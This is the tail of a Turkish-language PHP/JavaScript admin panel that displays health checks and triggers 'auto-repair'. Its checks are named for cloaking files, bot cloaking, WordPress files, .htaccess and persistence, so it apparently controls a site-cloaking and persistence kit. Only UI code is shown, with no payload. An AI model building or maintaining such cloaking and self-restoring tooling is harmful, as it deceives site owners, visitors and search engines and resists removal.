if(!d.success){el.innerHTML='<p style="color:var(--rd)">❌ '+eh(d.message)+'</p>';return;}
const r=d.data;
const items=[r.main,r.ping,r.cloak_file,r.cloak_bot,r.wp_files,r.htaccess,r.cloak_methods,r.persist];
let html='<div style="display:grid;grid-template-columns:repeat(auto-fill,minmax(280px,1fr));gap:8px;margin-bottom:12px">';
items.forEach(item=>{
if(!item)return;
const col=item.ok?'var(--gr)':item.ok===false?'var(--rd)':'var(--yl)';
html+=`<div style="background:var(--s2);border:1px solid ${col}33;border-radius:8px;padding:10px 12px;font-size:.84em">
<span style="color:${col}">${eh(item.label||'')}</span>
</div>`;
});
html+='</div>';
if(r.issues&&r.issues.length){
html+='<div style="background:#2a1a1a;border:1px solid var(--rd);border-radius:8px;padding:12px;margin-top:4px">'
+'<div style="color:var(--rd);font-weight:600;margin-bottom:8px">⚠️ Tespit edilen sorunlar:</div>';
r.issues.forEach(i=>{html+=`<div style="color:var(--yl);font-size:.83em;margin-bottom:4px">• ${eh(i)}</div>`;});
html+='<button class="btn btn-p btn-sm" onclick="autoRepair()" style="margin-top:10px">🔧 Oto-Onarım Başlat</button></div>';
} else {
html+='<div style="background:#0d2a0d;border:1px solid var(--gr);border-radius:8px;padding:10px 12px;font-size:.84em;color:var(--gr)">✅ Tüm sistemler normal çalışıyor.</div>';
}
const card=document.getElementById('health-card');
card.style.borderColor=r.healthy?'var(--gr)':'var(--rd)';
el.innerHTML=html;
toast(r.healthy?'✅ Sistem sağlıklı':'⚠️ '+r.issues.length+' sorun tespit edildi',r.healthy?'s':'e');
}).catch(e=>{btn.disabled=false;btn.textContent='🔍 Kontrol Et';toast('❌ '+e,'e');});
}
async function autoRepair(){
const btn=document.getElementById('repair-btn');
const el=document.getElementById('health-results');
btn.disabled=true;btn.textContent='⏳ Onarılıyor...';
el.innerHTML='<p style="color:var(--mu);font-size:.84em">⚙️ Onarım yapılıyor, lütfen bekleyin...</p>';
post({action:'auto_repair'}).then(d=>{
btn.disabled=false;btn.textContent='🔧 Oto-Onarım';
if(!d.success){el.innerHTML='<p style="color:var(--rd)">❌ '+eh(d.message)+'</p>';return;}
let html='<div style="margin-bottom:10px;font-weight:600">🔧 Onarım Raporu:</div>';
(d.log||[]).forEach(l=>{
const col=l.type==='fix'?'var(--gr)':l.type==='warn'?'var(--yl)':l.type==='ok'?'var(--gr)':'var(--mu)';
html+=`<div style="color:${col};font-size:.84em;margin-bottom:5px;padding:6px 10px;background:var(--s2);border-radius:6px">${eh(l.msg)}</div>`;
});
el.innerHTML=html;
toast('✅ Onarım tamamlandı','s');
// 2 saniye sonra tekrar kontrol et
setTimeout(healthCheck, 2000);
}).catch(e=>{btn.disabled=false;btn.textContent='🔧 Oto-Onarım';toast('❌ '+e,'e');});
}
// ── Init ──────────────────────────────────────
document.addEventListener('keydown',e=>{if(e.key==='Escape')document.querySelectorAll('.modal.open').forEach(m=>m.classList.remove('open'));});
window.addEventListener('load',()=>{
switchTab('<?= $tab ?>');
loadDashboard();
loadPersistStatus();
});
</script>
</body>
</html>
OHA YOOO - Tarih: 2026-05-18 05:25:58